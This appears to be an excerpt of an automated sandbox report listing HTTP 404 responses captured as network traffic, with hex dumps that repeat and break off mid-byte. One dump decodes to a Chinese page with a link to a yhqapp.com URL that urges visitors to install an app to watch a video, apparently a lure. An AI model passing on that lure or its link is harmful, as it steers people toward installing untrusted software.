2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 29 Aug 2024 10:25:12 GMTConnection: closeContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 29 Aug 2024 10:25:15 GMTConnection: closeContent-Length: 5112Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 10:25:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"6692a6ec-35f"Content-Encoding: gzipData Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 4f de d1 dd ef f4 e0 33 fd b2 3a 7d da b9 08 7b 93 f3 57 64 a7 7f 89 16 af 8f 99 81 04 a7 f1 66 2f 3e 3c fa d9 5e 9b 41 9c 1b b0 58 2c 97 93 80 7c 7f d0 8e 4e 56 a7 bb a7 e4 78 48 3a fe fd 95 95 a8 ff 95 6c ef f1 bc ac 21 39 59 a3 5d 9f 06 23 fa f1 05 0d ba 99 2f 01 09 f7 49 f8 8d 6c 8e c8 fb 6e f4 b2 43 7a 09 dd fc b3 e4 8e 9d 3e d9 fa 44 b6 3f 64 1d 7e 7f b6 b4 cf 5c ee ec 08 b8 6f 6e e1 f8 ed 33 3a ec 4c 86 5b e4 f8 6c 1a 3c 67 00 99 9b 1d 49 f4 e3 80 6d 26 7d 7f 1a be 61 6c 57 79 d8 02 e9 9f 4f 86 7e 34 1e 93 47 83 2c 1b 19 9c 45 eb e3 69 e0 27 20 57 1c 12 ff 83 18 5b 72 8f 7e 01 9b 20 83 c3 5f 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c*jAtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,\|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 10:25:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"6692a6ec-35f"Content-Encoding: gzipData Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 4f de d1 dd ef f4 e0 33 fd b2 3a 7d da b9 08 7b 93 f3 57 64 a7 7f 89 16 af 8f 99 81 04 a7 f1 66 2f 3e 3c fa d9 5e 9b 41 9c 1b b0 58 2c 97 93 80 7c 7f d0 8e 4e 56 a7 bb a7 e4 78 48 3a fe fd 95 95 a8 ff 95 6c ef f1 bc ac 21 39 59 a3 5d 9f 06 23 fa f1 05 0d ba 99 2f 01 09 f7 49 f8 8d 6c 8e c8 fb 6e f4 b2 43 7a 09 dd fc b3 e4 8e 9d 3e d9 fa 44 b6 3f 64 1d 7e 7f b6 b4 cf 5c ee ec 08 b8 6f 6e e1 f8 ed 33 3a ec 4c 86 5b e4 f8 6c 1a 3c 67 00 99 9b 1d 49 f4 e3 80 6d 26 7d 7f 1a be 61 6c 57 79 d8 02 e9 9f 4f 86 7e 34 1e 93 47 83 2c 1b 19 9c 45 eb e3 69 e0 27 20 57 1c 12 ff 83 18 5b 72 8f 7e 01 9b 20 83 c3 5f 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c*jAtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,\|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 10:25:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"6692a6ec-35f"Content-Encoding: gzipData Raw: 32 31 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 93 dd 6e d3 30 18 86 8f 8b c4 3d 84 70 ba 36 05 36 a9 45 4e 10 27 3b de 2d b8 a9 ab 44 ca 1f a9 db d0 b3 6e 53 37 aa 74 dd 40 63 42 5b 26 c4 18 63 08 01 1d 3f a2 74 29 5c 0c b5 9b 1c ed 16 70 12 b3 15 a8 c8 41 2c bf 7e fd 7d cf eb c4 e0 46 d5 56 71 cb 41 82 86 4d 43 b9 7e 0d 5c 8e 08 56 d9 98 03 26 c2 50 b0 a0 89 64 d1 b5 2b 36 ae 8b 82 6a 5b 18 59 58 16 2d 1b ba aa a6 37 91 f8 b7 b5 a9 23 cf b1 5d 3c 63 f6 f4 2a d6 e4 2a 6a ea 2a ca a7 93 05 41 b7 74 ac 43 23 5f 57 a1 81 e4 5b 85 e2 82 60 32 cd 6c 98 5c 2a 16 96 98 04 1f ce 48 b7 13 57 a3 8e dc 74 0e 2b 4c 6a 21 46 25 25 d8 29 82 aa 41 b7 8e 58 cb 06 ae e5 4b 09 1b c0 3a 36 90 42 83 36 dd 1b 44 af 37 e2 a3 c7 40 ca 34 b6 28 f1 b0 a0 62 57 5b 49 92 5c 0e 38 0a d0 16 15 45 61 8b 8b ec e5 a4 01 33 11 d4 58 24 96 cb b0 5d 59 bc b9 bc 5c 64 8f f8 47 ed 8b 70 1f 48 89 eb 9f ed 50 d0 5c 54 93 35 8c 9d bb 92 e4 79 5e a1 a5 3d 80 8e 53 50 6d 53 ba 77 a7 5c 2e 95 d2 1e ff 33 f0 9a 90 d7 e5 54 93 e1 68 32 da a0 4f de d1 dd ef f4 e0 33 fd b2 3a 7d da b9 08 7b 93 f3 57 64 a7 7f 89 16 af 8f 99 81 04 a7 f1 66 2f 3e 3c fa d9 5e 9b 41 9c 1b b0 58 2c 97 93 80 7c 7f d0 8e 4e 56 a7 bb a7 e4 78 48 3a fe fd 95 95 a8 ff 95 6c ef f1 bc ac 21 39 59 a3 5d 9f 06 23 fa f1 05 0d ba 99 2f 01 09 f7 49 f8 8d 6c 8e c8 fb 6e f4 b2 43 7a 09 dd fc b3 e4 8e 9d 3e d9 fa 44 b6 3f 64 1d 7e 7f b6 b4 cf 5c ee ec 08 b8 6f 6e e1 f8 ed 33 3a ec 4c 86 5b e4 f8 6c 1a 3c 67 00 99 9b 1d 49 f4 e3 80 6d 26 7d 7f 1a be 61 6c 57 79 d8 02 e9 9f 4f 86 7e 34 1e 93 47 83 2c 1b 19 9c 45 eb e3 69 e0 27 20 57 1c 12 ff 83 18 5b 72 8f 7e 01 9b 20 83 c3 5f 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 21a}n0=p66EN';-DnS7t@cB[&c?t)\pA,~}FVqAMC~\V&Pd+6j[YX-7#]<c*jAtC#_W[`2l\*HWt+Lj!F%%)AXK:6B6D7@4(bW[I\8Ea3X$]Y\dGpHP\T5y^=SPmSw\.3Th2O3:}{Wdf/><^AX,\|NVxH:l!9Y]#/IlnCz>D?d~\on3:L[l<gIm&}alWyO~4G,Ei' W[r~ _0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 10:25:38 GMTContent-Type: text/htmlContent-Length: 863Connection: closeVary: Accept-EncodingETag: "6692a6ec-35f"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2e 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e e6 9c 80 e6 96 b0 e8 a7 86 e9 a2 91 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 09 09 09 3c 70 3e 3c 68 34 3e 3e 3e 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 09 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e6 9c 80 e6 96 b0 e8 a7 86 e9 a2 91 ef bc 9a 3c 2f 66 6f 6e 74 3e 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 09 3c 70 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 79 68 71 61 70 70 2e 63 6f 6d 2f 3f 33 39 39 38 38 3e 3c 68 34 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 79 68 71 61 70 70 2e 63 6f 6d 2f 3f 33 39 39 38 38 3c 2f 68 34 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 68 34 3e e4 b8 ba e4 ba 86 e6 92 ad e6 94 be e6 9b b4 e6 b5 81 e7 95 85 ef bc 8c e4 bb a5 e5 90 8e e6 96 b0 e8 a7 86 e9 a2 91 e9 83 bd e6 94 be e5 9c a8 e9 87 8c e9 9d a2 e3 80 82 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 39 39 30 30 22 3e e8 a7 86 e9 a2 91 e9 9c 80 e8 a6 81 e7 94 a8 e5 a4 b8 e5 85 8b 41 50 50 e8 8e b7 e5 8f 96 3c 2f 66 6f 6e 74 3e ef bc 8c e5 a6 82 e6 89 8b e6 9c ba e6 b2 a1 e6 9c 89 e5 a4 b8 e5 85 8b ef bc 8c e4 bc 9a e5 bc b9 e5 87 ba e5 ae 89 e8 a3 85 e5 8c 85 ef bc 8c 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e5 ae 89 e8 a3 85 e5 90 8e e5 8d b3 e5 8f af e8 8e b7 e5 8f 96 e8 a7 86 e9 a2 91 3c 2f 66 6f 6e 74 3e e3 80 82 3c 2f 68 34 3e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 68 34 3e e4 b8 ba e4 ba 86 e8 a7 86 e9 a2 91 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e9 ab 98 e6 b8 85 e4 b8 8d e5 a4 b1 e7 9c 9f ef bc 8c e8 a7 86 e9 a2 91 e6 94 be e8 bf 9b e4 ba 86 e5 8e 8b e7 bc a9 e5 8c 85 3c 2f 66 6f 6e 74 3e ef bc 8c e8 bf 9b e5 8e bb e4 b8 8b e8 bd bd e5 88 b0 e6 89 8b e6 9c ba e5 b0 b1 e8 83 bd e7 9c 8b e3 80 82 3c 68 34 3e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html><head><meta name="robots" content="noarchive"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=ye
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 29 Aug 2024 10:25:43 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 